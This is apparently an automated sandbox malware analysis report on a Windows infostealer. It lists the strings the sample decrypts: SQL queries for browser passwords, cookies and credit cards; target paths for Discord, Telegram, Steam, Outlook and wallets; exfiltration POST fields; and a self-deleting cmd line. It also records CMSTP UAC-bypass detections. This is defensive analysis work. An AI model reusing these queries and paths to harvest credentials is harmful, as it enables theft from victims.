Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: InternetOpenUrlA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: InternetConnectA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: InternetCloseHandle
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: InternetOpenA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: HttpSendRequestA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: HttpOpenRequestA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: InternetReadFile
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: InternetCrackUrlA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: StrCmpCA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: StrStrA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: StrCmpCW
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: PathMatchSpecA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RmStartSession
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RmRegisterResources
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RmGetList
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RmEndSession
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3_open
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3_step
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3_column_text
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3_finalize
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3_close
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3_column_blob
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: encrypted_key
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: PATH
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: NSS_Init
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: NSS_Shutdown
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: PK11_FreeSlot
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: PK11_Authenticate
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: C:\ProgramData\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: browser:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: profile:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: url:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: login:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: password:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Opera
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: OperaGX
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Network
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: cookies
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: .txt
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: TRUE
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: FALSE
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: autofill
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: history
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: name:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: month:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: year:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: card:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Cookies
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Login Data
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Web Data
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: History
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: logins.json
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: formSubmitURL
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: usernameField
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: encryptedUsername
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: encryptedPassword
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: guid
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: cookies.sqlite
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: formhistory.sqlite
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: places.sqlite
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: plugins
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Local Extension Settings
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Sync Extension Settings
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: IndexedDB
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Opera Stable
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Opera GX Stable
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CURRENT
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: chrome-extension_
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Local State
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: profiles.ini
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: chrome
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: opera
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: firefox
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: wallets
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ProductName
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ProcessorNameString
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: DisplayName
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: DisplayVersion
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Network Info:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - IP: IP?
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Country: ISO?
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: System Summary:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - HWID:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - OS:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Architecture:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - UserName:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Computer Name:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Local Time:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - UTC:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Language:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Keyboards:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Laptop:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Running Path:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - CPU:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Threads:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Cores:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - RAM:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - Display Resolution:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: - GPU:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: User Agents:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Installed Apps:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: All Users:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Current User:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Process List:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: system_info.txt
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: freebl3.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: mozglue.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: msvcp140.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: nss3.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: softokn3.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: vcruntime140.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \Temp\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: .exe
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: runas
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: open
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: /c start
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %DESKTOP%
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %APPDATA%
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %USERPROFILE%
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %DOCUMENTS%
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %RECENT%
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: *.lnk
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: files
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \discord\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \Telegram Desktop\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: key_datas
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: map*
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Telegram
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: *.tox
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: *.ini
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Password
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: 00000001
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: 00000002
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: 00000003
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: 00000004
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Pidgin
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \.purple\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: accounts.xml
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: token:
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Software\Valve\Steam
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SteamPath
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \config\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ssfn*
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: config.vdf
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: DialogConfig.vdf
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: libraryfolders.vdf
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: loginusers.vdf
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \Steam\
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sqlite3.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: browsers
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: done
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: soft
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: https
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: POST
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: HTTP/1.1
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: hwid
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: build
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: token
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: file_name
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: file
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: message
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	10_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	10_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	10_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	10_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	10_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C206C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	10_2_6C206C80
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C35A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	10_2_6C35A9A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C324420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	10_2_6C324420
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C354440 PK11_PrivDecrypt,	10_2_6C354440
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3544C0 PK11_PubEncrypt,	10_2_6C3544C0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00864280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	18_2_00864280
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_008645A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	18_2_008645A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 22.2.cmd.exe.52f0e64.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.52f0264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.UniversalInstaller.exe.43e9d5b.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.UniversalInstaller.exe.3e3015b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.cmd.exe.54dd976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.52ac976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.cmd.exe.5521e64.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.UniversalInstaller.exe.43e915b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.UniversalInstaller.exe.36f286d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.UniversalInstaller.exe.373615b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.cmd.exe.5521264.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.UniversalInstaller.exe.3e30d5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.UniversalInstaller.exe.3736d5b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.UniversalInstaller.exe.3dec86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.UniversalInstaller.exe.43a586d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.1802561648.0000000003DE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2050713251.00000000054D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UniversalInstaller.exe PID: 7176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UniversalInstaller.exe PID: 7228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Unpacked PE file: 0.2.zLwT7vCojz.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Unpacked PE file: 10.2.u48o.0.exe.400000.0.unpack

Source: zLwT7vCojz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 169.150.236.99:443 -> 192.168.2.7:49715 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: nss3.pdb@ source: u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2517001138.00000256583E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2521152454.0000025659B80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: wntdll.pdb source: Qg_Appv5.exe, 0000000D.00000002.1448048593.0000000005170000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1426785944.0000000003140000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1386928542.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388922444.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475980703.0000000003828000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1477591260.0000000003B80000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1480438511.000000000403F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713172266.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713421487.00000000053D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
